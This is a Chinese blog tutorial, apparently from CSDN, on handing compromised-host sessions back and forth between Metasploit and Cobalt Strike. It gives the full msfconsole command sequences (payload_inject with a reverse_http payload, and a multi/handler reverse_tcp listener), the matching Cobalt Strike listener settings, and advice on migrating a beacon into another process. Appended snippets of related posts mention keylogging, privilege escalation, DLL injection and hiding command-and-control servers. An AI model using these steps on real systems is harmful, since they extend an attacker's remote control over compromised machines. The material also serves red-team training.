metasploit与Cobaltstrike互相派生shell

最新推荐文章于 2023-10-09 15:52:41 发布
最新推荐文章于 2023-10-09 15:52:41 发布
阅读量869 收藏 2
点赞数
分类专栏: 渗透 文章标签: metasploit msfconsole 渗透 Cobalt Strike
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/NEARU/article/details/103346345
版权

metasploit与Cobaltstrike互相派生shell

为什么需要派生

3.x 版本之后,和msfonsole分离了,是一个独立的团队协作工具

 1.复用两个工具的功能
 2.对其中某个工具使用不熟练
 3.Cobalt strike 的beaconshell不稳定。尤其是powershell生成的程序,尽快将其migrate 到另一个进程里做后续操作

对迁移进程的目标选择:
使用ps列出进程信息,选择同架构(x86,x64),同权限(system/administrator/user)的exe进程进行迁移

相互派生shell可使用如下步骤操作

1. msf 派生 shell 给 Cobalt strike

(前提有一个meterpreter)

1.1 Cobalt Strike创建一个Listener

创建以windows/becon_http/reverse_http为payload的 Listener
并设置参数:

	   ip:(192.168.1.100)    # Cobalt Strike Server的ip地址
	   端口: (1212)

等待msfconsole设置完成并执行,就可以得到一个beconshell

1.2 在msf的session中建立一条连接

msf exploit(handler) >  use exploit/windows/local/payload_inject
msf exploit(payload_inject) >  set PAYLOAD windows/meterpreter/reverse_http
msf exploit(payload_inject) > set DisablePayloadHandler true
msf exploit(payload_inject) > set LHOST 192.168.1.100
msf exploit(payload_inject) > set LPORT 1212
msf exploit(payload_inject) > set SESSION 1
msf exploit(payload_inject) > exploit

2. Cobalt strike 派生 shell 给 MSF

(前提有个beaconshell)

2.1 在msfconsole中创建反向监听

msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.100
lhost => 192.168.1.100
msf exploit(handler) > set lport 5555
lport => 5555
msf exploit(handler) > exploit

2.2 使用Cobalt Strike创建一个Listener

创建以
windows/foreign/reverse_tcp
为payload的 Listener
并设置和2.1中的设置的参数一致:
ip为msf的ip地址(192.168.1.100),
端口为msf所监听的端口(5555)。
然后选中计算机,右键->Spawn,选择刚刚创建的监听器。
msf中即可看到成功获取了meterpreter会话

参考

  • https://www.cnblogs.com/test404/p/10599981.html
  • https://www.jianshu.com/p/8d823adbc6b5
此人亦非
关注
专栏目录
CobaltStrikeMetasploit会话相互派生
box
03-01 399
CobaltStrikeMetasploit会话相互派生 0x01 CS ===> MSF 步骤 CS创建Foreign监听器 MSF 设置监听 和同类型payload CS 执行Spawn 派生MSF对应的监听器 1.1 CS创建Foreign监听器 1.1 MSF 设置监听 和同类型payload 使用监听器 exploit/multi/handler 模块 使用 同CS 监听器(msf)同类型 payload 运行 exploit 1.3 CS 执行Spawn 派生MSF对应
CobaltStrike系列学习笔记——(三)与metasploit互相派生shell
limb0的博客
12-07 1569
CobaltStrike系列学习笔记——(三)与metasploit互相派生shell 实验环境 系统 IP地址 CS(服务器/客户端) kali 192.168.134.130 靶机 win7 192.168.134.135 MSF kali 192.168.134.138 ...
CobaltStrike(CS)与MetasploitFramework(MSF)联动
LuckySec
12-04 2449
0x01 CS与MSF CobaltStrike(简称CS)是一款美国Red Team开发的渗透测试神器。Armitage是一个MetasploitFramework(简称MSF)的图形化界面工具,而Cobaltstrike大家可以理解其为Armitage的商业版。 早期版本CobaltSrtike依赖MetasploitFramework框架,而现在CobaltStrike已经不再使用MetasploitFramework而是作为单独的平台使用,它分为客户端(Client)与服务端(Teamserver)
Cobalt StrikeMetasploit会话互转
zzgslh的博客
03-20 1027
Cobalt StrikeMetasploit会话互转 一、前言 Cobalt StrikeMetasploit渗透测试经常会用到的两个工具,Cobalt StrikeMetasploit在很多地方都是兼容的,所以我们便可以将 Metasploit攻击产生的会话传递到 Cobalt Strike 上,同样的 Cobalt Strike 的会话也能够传递到 Metasploit上。 二、Metasploit会话转到Cobaltstrike (1)首先通过Metasploit获取会话。 (2)会话
cobalt strike 会话转移
Armandhe的博客
06-22 2617
纯属笔记
Cobaltstrike系列教程(六)文件/进程管理与键盘记录
J0o1ey Blog
08-09 5964
0x000-前文 2000人网络安全交流群,欢迎大佬们来玩 群号820783253 0x001-文件管理 ①基础管理 选择一个会话,右键,目标–>文件管理 Upload为上传一个文件 ,Make Directory为创建文件夹,List Drives为列出盘符,refresh为刷新,这块很简单,就不一一讲了。 ②下载文件 ...
全网最全的Cobalt Strike使用教程-进阶篇
喜欢Python编程的程序员柚柚呀
08-17 7620
在这篇文章中,斗哥将详细介绍一下Cobalt Strike的各个模块是干什么的以及部分模块的具体使用方式。
红队专题-Cobalt strike从小白到飞升手册
最新发布
aming小老弟
10-09 1319
4.0 2019年12月2日 更新 Cobalt Strike 4.0 手册奇安信 A-TEAMCobalt Strike 是一款 美国Red Team开发的 商业GUI框架式 优秀的渗透测试工具 简称CS为对手模拟渗透测试 和红队行动而设计的 协作工具平台,主要用于执行有目标的攻击和模拟高级威胁者的后渗透行动。可以利用网络漏洞获取主机权限后、从一个强大的图形界面控制所有的活动。因可以调用Mimikatz等其他知名工具并且可以作为团队服务使用,因此广受网络安全人员喜爱。
cobaltstrike安装使用
w7deer的博客
05-06 5757
Cobalt Strike是一款基于java的渗透测试神器,被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马、win dll木马、java木马、office宏病毒等,钓鱼攻击包括:站点克隆,目标信息获取等
Cobalt strike的使用
weixin_50130859的博客
08-24 943
Cobalt strikeCobalt strike一.启动,连接服务器二.让主机上线 Cobalt strike Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界人称为CS。它是渗透测试中不可缺少的利器。其拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等功能。同时,Cobalt Strike还可以调用Mimikatz等其他知名工具,因此广受黑客喜爱。 Cobalt Strike分为客户端和服务端可
BOF-DLL-Inject:使用Cobalt Strike的信标目标文件实现手动Map DLL注入
04-14
BOF-DLL-注入 BOF DLL注入是一个自定义的,该使用手动映射DLL注入以便将dll全部从内存迁移进程中。 好处 不太可能被签名 DLL有效负载保留在内存中,永不接触磁盘 附加功能易于实现 DLL未在内核领域注册为包括EPROCESS结构的模块 笔记 要了解我如何开发此工具以及有关该工具的更多信息,请参阅我的博客
Cobalt Strike前期使用以及排坑
wh1te 小白的博客
01-09 2968
开启Cobaltstrike teamserver和运行GUI界面均需要Java环境 ps:最好是10.0.1版本 其他版本的java 我运行有些问题 服务器端开启: 进入Cobaltstrike 目录 [root@VM_0_5_centos ~]# cd CobaltStrike 开启服务端服务: [root@VM_0_5_centos CobaltS...
Cobalt Strike使用教程
huangyongkang666的博客
04-03 6161
Cobalt Strike使用教程 1.CS简介 ​ Cobalt Strike是一款渗透测试神器,常被业界人称为CS神器,是域渗透,内网渗透,内网漫游,后渗透手段利器,但前提是获得一台主机的shell。早期版本CobaltSrtike依赖Metasploit框架,而现在Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端(Client)与服务端(Teamserver),服务端是一个,客户端可以有多个,团队可进行分布式协团操作 ​ Cobalt Strike集成了端口转发、扫
CS会话派生MSF会话
weixin_43047908的博客
08-16 1811
目录前言环境设置外部监听msf建立监听CS派生会话msfshell传给CS 前言 有时候,我们通过cs拿到一些机器的shell,想利用msf中的一些功能,这个时候,需要我们将shell传给msf之中,这也是本文的主要内容。 另外,msf也可以将shell传给CS。但是因为CS拿shell比较方便,所以,多数情况下是CS传给MSF。 环境设置 我们cs已经拿下一台机器的shell。不在过多赘述。 外部监听 msf建立监听 注意,“ lhost ”是指本机IP的意思;“ rhost ”才是目标机器的IP
Cobalt Strike进程注入
qq_32445755的博客
04-22 1244
前言 Cobalt Strike目前提供了一些场景下的进程注入功能,最常见的就是直接将Payload注入到新进程中去,该功能可通过您已获取到的种种会话中去执行,比如Artifact Kit,Applet Kit和Resource Kit。 本文将重点介绍了Cobalt Strike的在Beacon会话中的进程注入。 使用 选择进程列表 注入进程 成功注入 稳定的注入 shspawn x64 C:\Users\Administrator\Desktop\payload.b...
Cobaltstrike系列教程(十一)提权与横向移动
J0o1ey Blog
01-19 6870
0x001-提权 1.右键菜单提权: 选择beacon,右键,执行–>提权 我由于加载了插件,所以比官方多了几种提权方式 插件下载请看我之前的帖子 ms14-058/ms15-051/ms16-016/ms16-032 这些都是大家耳熟能详...
Cobaltstrike系列教程(一)简介与安装
热门推荐
J0o1ey Blog
08-01 8万+
0x001-Cobaltstrike简介 Cobalt Strike是一款美国Red Team开发的渗透测试神器,常被业界人称为CS。这款神器许多大佬们都已经玩的很6,我一个菜鸡玩的略有心得,因此写一下自己的Cobaltstrike系列文章,希望给各位一点帮助。 最近这个工具大火,成为了渗透测试中不可缺少的利器。其拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,offi...
Cobalt Strike折腾踩坑填坑记录
Ca3tie1的博客
03-10 9231
文章目录0X00 背景0x01 基础原理0x02 关于破解Exit暗桩0x03 CDN+反代隐藏TeamserverDomain FrontingProxy0x04 DNS上线一个未填的坑DNS Listener特性0x05 结语 0X00 背景 最近在做渗透测试相关的工作,因工作需要准备用Cobalt Strike,老早都知道这款神器,早几年也看过官方的视频教程,但英文水平太渣当时很多都没听懂,...
CobaltStrike使用-第一篇(基本使用方法、监听器、重定向器,以及通过重定向器隐藏C2服务器)
Love&Share
11-29 5213
文章目录基本使用客户端与服务器连接上线CS基本步骤基础设施监听器BeaconDNS BeaconDNS请求原理实验避坑重定器实验 Cobalt Strike是一款综合的渗透测试神器 官网:https://www.cobaltstrike.com/ 工具的社区版是Armitage(一个MSF的图形化界面工具),CobaltStrike为收费商业版本 手册:CobaltStrike4.0用户手册_中文翻译、4.3、狼组版 Cobalt Strike使用C/S架构,Cobalt Strike的客户端连接到团.
简述MetasploitCobalt Strike生成木马的过程
03-25
好的,MetasploitCobalt Strike都是用于生成木马的工具,它们通常使用漏洞来实现攻击。具体来说,Metasploit的流程大致是这样的:首先,Metasploit生成一系列payloads,这些payloads是一段特殊的代码,可以在目标机器上运行。然后,攻击者选择一个合适的漏洞,并将payloads绑定到该漏洞上。最后,攻击者执行攻击,以便让目标机器运行payloads,从而获取对目标机器的控制。 Cobalt Strike也是类似的过程,首先要通过漏洞获取目标机器的控制权,然后可以利用该控制权来执行各种命令。Cobalt Strike具有更多的GUI功能,例如:更直观的界面、更好的交互式shell等。 总的来说,MetasploitCobalt Strike都是强大的工具,可以帮助攻击者生成木马、获取目标机器的控制权,并实现各种攻击和渗透攻击任务。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值